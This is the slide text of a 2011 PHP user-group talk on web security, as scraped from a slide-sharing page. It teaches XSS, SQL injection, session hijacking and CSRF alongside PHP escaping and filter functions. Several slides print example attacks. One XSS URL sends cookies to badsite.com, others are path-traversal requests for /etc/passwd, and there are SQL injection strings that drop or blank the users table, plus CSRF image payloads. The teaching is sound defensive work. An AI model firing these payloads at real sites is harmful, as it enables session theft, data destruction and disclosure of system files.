Security and PHP<br />February 2011<br />
Allan Shone<br />Technical Yahoo!, Local Paranoid @Yahoo!7<br />Been at Yahoo!7 just under 3 years<br />allan.shone@yahoo....
Website Security<br />February 2011<br />
What is Security?<br />Why is Security important?<br />What can you do about it?<br />
Types of issues<br />XSS<br />SQL Injection<br />Session Hijacking<br />CSRF<br />Phishing<br />
Why XSS?<br />February 2011<br />
Lead to larger problems<br />Used to inject code into your site<br />Bad people ™ can steal user information<br />
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E<br />http://sydphp.leetbix.com/template...
February 2011<br />
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00<br />http://sydphp.leetbix.com/template.php?load=../some-config...
POST too<br />February 2011<br />
What do I do?!<br />February 2011<br />
Filter<br />Simplest solution: htmlentities()<br />February 2011<br />
SQL what?<br />February 2011<br />
Arbitrary SQL code being executed<br />Bypass login, edit database content<br />Find passwords, hidden information<br />
http://sydphp.leetbix.com/login.php<br />Password: ‘ OR 1=1 -- ‘<br />‘ OR 1=1; DROP TABLE users; -- ‘<br />‘ OR 1=1; UPDA...
Oh no!<br />February 2011<br />
http://xkcd.com/327/<br />February 2011<br />
escape<br />February 2011<br />
mysql_real_escape_string()<br />addslashes()<br />PDO<br />PDO::quote()<br />
Session hijacking<br />February 2011<br />
Bad for users<br />Bad for data integrity<br />Easy to prevent<br />
Not stand-alone<br />February 2011<br />
Cookies<br />February 2011<br />
Integrity checking<br />February 2011<br />
CSRF? Sugar?<br />February 2011<br />
Cross-site request forgery<br />February 2011<br />
Simple, but un-common<br />February 2011<br />
<imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /><br /><script><br />a=document.createElement(‘img’);a.src=‘htt...
Integrity, integrity<br />February 2011<br />
Phishing!<br />February 2011<br />
Same, but different?<br />February 2011<br />
But what can you do<br />February 2011<br />
PHP’s filter functions<br />February 2011<br />
filter_has_var<br />filter_id<br />filter_input_array<br />filter_input<br />filter_list<br />filter_var_array<br />filter...
No more SuperGlobals<br />February 2011<br />
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);<br />echo ”<h3>No results found for ‘{$search}...
INPUT_GET<br />INPUT_POST<br />INPUT_COOKIE<br />INPUT_SERVER<br />INPUT_ENV<br />February 2011<br />
Twitter <br />Allan Shone - @cerealboy<br />Jared Mooring - @jadzor<br />Filter function filters: http://au2.php.net/manua...
Upcoming SlideShare
Loading in...5
×

SydPHP Security in PHP

1,059

Published on

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,059
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
18
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

SydPHP Security in PHP

  1. 1. Security and PHP<br />February 2011<br />
  2. 2. Allan Shone<br />Technical Yahoo!, Local Paranoid @Yahoo!7<br />Been at Yahoo!7 just under 3 years<br />allan.shone@yahoo.com<br />
  3. 3. Website Security<br />February 2011<br />
  4. 4. What is Security?<br />Why is Security important?<br />What can you do about it?<br />
  5. 5. Types of issues<br />XSS<br />SQL Injection<br />Session Hijacking<br />CSRF<br />Phishing<br />
  6. 6. Why XSS?<br />February 2011<br />
  7. 7. Lead to larger problems<br />Used to inject code into your site<br />Bad people ™ can steal user information<br />
  8. 8. http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E<br />http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E<br />http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E<br />February 2011<br />
  9. 9. February 2011<br />
  10. 10. http://sydphp.leetbix.com/template.php?load=/etc/passwd%00<br />http://sydphp.leetbix.com/template.php?load=../some-config.conf%00<br />February 2011<br />
  11. 11. POST too<br />February 2011<br />
  12. 12. What do I do?!<br />February 2011<br />
  13. 13. Filter<br />Simplest solution: htmlentities()<br />February 2011<br />
  14. 14. SQL what?<br />February 2011<br />
  15. 15. Arbitrary SQL code being executed<br />Bypass login, edit database content<br />Find passwords, hidden information<br />
  16. 16. http://sydphp.leetbix.com/login.php<br />Password: ‘ OR 1=1 -- ‘<br />‘ OR 1=1; DROP TABLE users; -- ‘<br />‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘<br />February 2011<br />
  17. 17. Oh no!<br />February 2011<br />
  18. 18. http://xkcd.com/327/<br />February 2011<br />
  19. 19. escape<br />February 2011<br />
  20. 20. mysql_real_escape_string()<br />addslashes()<br />PDO<br />PDO::quote()<br />
  21. 21. Session hijacking<br />February 2011<br />
  22. 22. Bad for users<br />Bad for data integrity<br />Easy to prevent<br />
  23. 23. Not stand-alone<br />February 2011<br />
  24. 24. Cookies<br />February 2011<br />
  25. 25. Integrity checking<br />February 2011<br />
  26. 26. CSRF? Sugar?<br />February 2011<br />
  27. 27. Cross-site request forgery<br />February 2011<br />
  28. 28. Simple, but un-common<br />February 2011<br />
  29. 29. <imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /><br /><script><br />a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a);<br />a.src=‘http://badsite.com/otherpage’;<br /></script><br />February 2011<br />
  30. 30. Integrity, integrity<br />February 2011<br />
  31. 31. Phishing!<br />February 2011<br />
  32. 32. Same, but different?<br />February 2011<br />
  33. 33. But what can you do<br />February 2011<br />
  34. 34. PHP’s filter functions<br />February 2011<br />
  35. 35. filter_has_var<br />filter_id<br />filter_input_array<br />filter_input<br />filter_list<br />filter_var_array<br />filter_var<br />
  36. 36. No more SuperGlobals<br />February 2011<br />
  37. 37. $search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);<br />echo ”<h3>No results found for ‘{$search}’.</h3>";<br />echo "<a href='?search=$search&page=2'>Next page</a>";<br />February 2011<br />
  38. 38. INPUT_GET<br />INPUT_POST<br />INPUT_COOKIE<br />INPUT_SERVER<br />INPUT_ENV<br />February 2011<br />
  39. 39. Twitter <br />Allan Shone - @cerealboy<br />Jared Mooring - @jadzor<br />Filter function filters: http://au2.php.net/manual/en/filter.filters.php<br />February 2011<br />
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×